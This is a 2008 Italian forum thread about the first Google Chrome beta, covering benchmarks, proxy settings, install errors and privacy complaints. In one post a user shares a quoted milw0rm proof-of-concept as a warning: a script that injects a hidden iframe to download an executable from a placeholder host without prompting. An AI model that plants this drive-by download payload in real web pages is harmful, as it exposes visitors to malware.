|
|
|
![]() |
|
Strumenti |
![]() |
#181 | |
Senior Member
Iscritto dal: Sep 2002
Città: Cagliari
|
Quote:
Comunque non mi pare attinente alla discussione che parla di velocità pura di navigazione. Sul fatto che sia lecito o immorale si può aprire un'altra discussione a cui parteciperei volentieri. |
|
![]() |
![]() |
![]() |
#182 | |
Senior Member
Iscritto dal: Apr 2006
|
Quote:
L'alternativa è che abbiano rilasciato una versione "semplice", per poi arricchirla nel corso dello sviluppo (una politica intelligente tra l'altro). (Ti ho risposto nella pagina prima per i test ![]() |
|
![]() |
![]() |
![]() |
#183 |
Senior Member
Iscritto dal: Apr 2001
|
Per quel che può valere...
ecco il test sunSpider per Chrome, Mozilla 3.0.1 e IE6 (NON 7) che misura la velocità del javascript. Da notare che il test per IE è stato notevolmente peggiorato dalla parte di manipolazione stringhe... ![]()
![]() |
#184 |
Senior Member
Iscritto dal: Apr 2006
|
Manca il link all'immagine grossa. (Edit: lo hai aggiunto)
Comunque: ![]() (V8, Tracemonkey e Squirrelfish sono circa 5 volte più veloci del motore di IE 8 beta 2 ![]() |
![]() |
![]() |
![]() |
#185 |
Senior Member
Iscritto dal: Jan 2004
Città: Napoli@Roma
|
ma si può cambiare il colore dello sfondo delle pagine web come con FF?
![]()
![]() |
#186 | |
Senior Member
Iscritto dal: Mar 2001
Città: PV Milano Nord
|
Quote:
ma non riesco a fargli capire le credenziali del proxy quando è stato installato...ogni volta che lo apro devo specificagli le mie... e non posso impostargli un proxy diverso da quello di default...
![]() |
![]() |
![]() |
#187 |
Senior Member
Iscritto dal: Mar 2005
|
installato oggi, pare veramente notevole soprattutto considerando che è una beta!
velocissimo e l'interfaccia è semplice e intuitiva e ha delle funzioni simpatiche e utili, non capisco però come fare queste cose: come faccio a fare in modo che quando scrivo sulla barra degli indirizzi una parola ad esempio youtube o wikipedia e poi premo TAB, mi faccia fare la ricerca sul relativo sito direttamente dalla barra? Non riesco a farla funzionare ![]()
![]() |
#188 |
Senior Member
Iscritto dal: Nov 2005
Città: Milano
|
E'un browser primitivo, anche se è solo una beta. Mancino una vagonata di funzioni utilissime.
Tiscali Ultrafibra Facile ![]() TIM Smart 100/20 50/10: http://www.speedtest.net/result/4674090836.png http://www.speedtest.net/result/4329518539.png 30/3: http://www.speedtest.net/result/3405412925.png |
![]() |
![]() |
![]() |
#189 | |||
Senior Member
Iscritto dal: Jun 2003
Città: Milano Moto:Suzuki_GSR_k6
|
Quote:
![]() Quote:
![]() Quote:
PS: ora aggiorno il primo post con alcuni link che avete postato
![]() |
![]() |
#190 |
Senior Member
|
Altra comparativa
http://lifehacker.com/5044668/beta-b...ich-is-fastest
A8N-E.VENICE3200.ZALMAN7000B-ALCU.2x512 CORSAIRXPERT3200.GEFORCE-N6600LE.SAMSUNGSP2004C.NEC3540A.TAGAN480U22.CENTURION5 Ultima modifica di fulviettino : 03-09-2008 alle 21:47. |
![]() |
![]() |
![]() |
#191 |
Member
Iscritto dal: Jul 2008
|
Ho installato chrome ieri e vi diro' le miei impressioni:
mi piace l'interfaccia, il debugger javascript e il task manager. appena l ho installato si è aggiunto da solo i preferiti di firefox e che cavolo, poi sono andato in un sito delle poste 'phishato' e NON me l'ha segnalato al contrario di firefox e explorer. vabeh che è in una versione beta. io pero' non lo usero' mai... basta con questo google che vuole imporsi in tutti i campi mi ha veramente rotto . inoltre vi consiglio di leggere le 3 clausole in fase di installazione.. anzi le riporto qui: La prima dice che Google si e' riservata il diritto di installare sul tuo PC il servizio GoogleUpdate.exe e che puo' aggiornare automaticamente Chrome come e quando vuole Google, tu come utente non hai diritto di disattivare il servizio di update. La seconda clausola dice che tu utente che usi Chrome concedi a Google il diritto di fare quello che vuole con il contenuto delle pagine web che visiti con Chrome. Qualunque cosa venga visualizzata da Chrome (anche le email della tua webmail) diventa materiale che Google puo' usare a proprio piacimento. La terza clausola dice che alcuni dei servizi legati a Chrome mostrano pubblicita' che viene scelta in base a certi criteri e che i criteri e le modalita' di visualizzazione della pubblicita' sono soggetti a cambiamenti senza che questo richieda che l'utente venga informato a riguardo. La mia impressione e' che Chrome non sia stato creato per dare un impulso al Web, per evolverlo, ma semplicemente perche' se l'utente usa altri browser Google non ha modo di profilare l'utente. Google ha prima provato a "introdursi" nei PC degli utenti con Google Desktop, ma la cosa non ha avuto il successo sperato, ha quindi dovuto correre ai ripari con un approccio piu' drastico: cercare di prendere il posto dei vari IE, Firefox, Safari etc. in questo modo Google puo' garantirsi che gli utenti non installino sui propri browser gli AdSense block (le estensioni che bloccano la visualizzazione delle pubblicita' sui siti) oltre al fatto di poter raccogliere molte piu' informazioni sull'utente stesso allo scopo di presentagli pubblicita' estremamente mirata. ormai google non è solo un motore di ricerca ma è anche sinonimo di pubblicita' e antiprivacy tutto imho ovviamente Ultima modifica di xciaoatuttix : 03-09-2008 alle 21:29. |
![]() |
![]() |
![]() |
#192 | |
Senior Member
Iscritto dal: Jan 2003
Città: Roma
|
Quote:
E' come una automobile: puoi intervenire su un sacco di parti e migliorare tantissimo, ma il pianale rimane quello, vincolando tutto il resto.
![]() |
![]() |
#193 |
Senior Member
Iscritto dal: Oct 2005
Città: Roseto Degli Abruzzi
|
Occhio a navigare su siti poco raccomandati con Chrome.
Codice:
*************************************************************************** Author: nerex E-mail: nerex[at]live[dot]com Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it at your own risk. The author will not be responsible for any damages. Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA) ************************************************************************** <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> # milw0rm.com [2008-09-03] |
![]() |
![]() |
![]() |
#194 |
Member
Iscritto dal: Aug 2003
|
cacchio a me non ne vuole sapere di funzuionare...
mi da subito appena lo lancio "errore nell'inizializzazione dell'applicazione" e poi non mi fa navigare. già reinstallato, ma nada... iniziamo bene ![]() ![]()
PSN ID: sydsteus Linux user #296521 |
![]() |
![]() |
![]() |
#195 | |
Senior Member
|
Quote:
non potevano mettere un pannello per la config del proxy? io non voglio importare niente da altri programmi ma essere libero di decidere che proxy impostare...
![]() |
![]() |
![]() |
#196 |
Senior Member
|
http://www.google.com/support/chrome...y&topic=&type=
qui dice che usa le stesse impostazioni di windows... per ora decade il mio uso di chrome...dato che non mi va di usare 2 browser diversi tra casa e lavoro....e al lavoro non voglio tenerlo impostato col proxy pac che ho di default su windows dato che mi serve su ie per alcuni siti aziendali... e comunque senza qualcosa di simile a adblockplus non ne vale la pena.... sinceramente ho sempre apprezzato i prodotti google..ma su questo potevano impegnarsi di +... ok mi direte voi...è solo la beta...ma la prima impressione è quella che conta...e la prima volta che usai firefox ne rimasi subito impressionato ![]()
![]() |
![]() |
#197 | |
Senior Member
|
Quote:
Effettivamente il pannello di configurazione del proxy è assente e, come dicevamo prima, si appoggia a windows ![]()
![]() |
![]() |
#198 | |
Senior Member
|
Quote:
![]() ![]()
![]() |
![]() |
![]() |
#199 |
Senior Member
Iscritto dal: Dec 2003
|
l'ho messo da 2 giorni: il primo mi ha convinto, il secondo l'ho amato.
IE, per l'utilizzo che faccio di internet, non lo aprirò mai piu'.
![]() |
![]() |
#200 |
Member
Iscritto dal: Aug 2003
|
questo è l'errore che da a me prima di partire:
![]() dopo di che mi esce la pagina "uffa" e non mi fa navigare che posso fare???
PSN ID: sydsteus Linux user #296521 |
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 09:05.